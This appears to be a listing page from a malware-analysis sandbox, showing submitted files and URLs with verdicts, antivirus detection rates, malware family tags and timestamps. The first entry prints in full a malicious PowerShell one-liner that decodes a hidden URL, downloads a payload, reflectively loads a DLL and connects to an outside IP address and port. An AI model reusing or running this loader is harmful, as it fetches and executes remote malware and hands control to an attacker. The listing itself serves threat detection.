| ID | Detection | Sample Info | Download Report | Classification & Info | Graph |
|---|---|---|---|---|---|
1580965 |
Malicious
AV: None
|
powershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command "$base64Url = 'aHR0cHM6Ly8zMTA1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1tTDJfVG5JR0tRcW9jQjZ6THZjdk42OFRxX0ZwZkM0R2g4VkNnc3pfaURocVUzVVhfSF9veHYzY1V5c09VTHBNJnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMTczMDg1MTQ3MGEwOTA0Zg=='; $url = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64Url)); $webClient = New-Object System.Net.WebClient; $imageBytes = $webClient.DownloadData($url); $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); $startIndex -ge 0 -and $endIndex -gt $startIndex; $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $dllBytes = [Convert]::FromBase64String($base64Command); $assembly = [System.Reflection.Assembly]::Load($dllBytes); [Stub.main]::Main('87.120.116.179', '1300');
2024-12-26 14:33:27 +01:00
|
Info Class |
|
|
1580964 |
Malicious
AV: 21%
|
sshd.elf
2024-12-26 14:32:04 +01:00
|
Info |
|
|
1580963 |
Malicious
AV: None
|
https://www.gglusa.us/
2024-12-26 14:24:05 +01:00
|
Info Class |
|
|
1580962 |
Clean
|
https://account.mypaymentvault.com/contactus
2024-12-26 14:23:44 +01:00
|
Info |
|
|
1580961 |
Clean
|
http://my-msg.co/wow/?n=Jackie(dad)&m1
2024-12-26 14:23:34 +01:00
|
No classification & info
|
no Graph |
|
1580960 |
Clean
|
doc.pdf
2024-12-26 14:21:59 +01:00
|
Info |
|
|
1580959 |
Chione.exe
2024-12-26 14:18:08 +01:00
|
Info Class |
|
||
1580958 |
Malicious
LummaC
AV: 58%
|
0zBsv1tnt4.exe
2024-12-26 14:13:14 +01:00
|
Info Class |
|
|
1580957 |
j1gw88aHdL.exe
2024-12-26 14:13:14 +01:00
|
Info |
|
||
1580956 |
Malicious
AV: 34%
|
mBr65h6L4w.exe
2024-12-26 14:13:10 +01:00
|
Info Class |
|
|
1580955 |
Malicious
LummaC
AV: None
|
cqHMm0ykDG.exe
2024-12-26 14:13:07 +01:00
|
Info Class |
|
|
1580954 |
Malicious
AV: 39%
|
HrIrtCXI3s.exe
2024-12-26 14:13:07 +01:00
|
Info Class |
|
|
1580953 |
Clean
|
http://votedrterrycronin.com
2024-12-26 14:12:31 +01:00
|
Info |
|
|
1580951 |
Malicious
DBatLoader
AV: 57%
|
JIL-_Document_No._2500015903.cmd
2024-12-26 13:51:10 +01:00
|
Info Class |
|
|
1580950 |
51FZ8pgLbe.exe
2024-12-26 13:51:05 +01:00
|
Info Class |
|
||
1580949 |
Malicious
AV: 0%
|
setup.msi
2024-12-26 13:36:11 +01:00
|
Info Class |
|
|
1580948 |
Clean
|
General_ConfigTool_ChnEng_V5.001.0000003.1.R.20231130.exe
2024-12-26 13:34:04 +01:00
|
Info |
|
|
1580947 |
Malicious
AV: 0%
|
installer.msi
2024-12-26 13:24:12 +01:00
|
Info Class |
|
|
1580946 |
Malicious
AV: 0%
|
setup.msi
2024-12-26 13:20:16 +01:00
|
Info Class |
|
|
1580945 |
Incomplete analysis
AV: None
|
http://epicunitscan.info
2024-12-26 13:18:42 +01:00
|
Info |
|
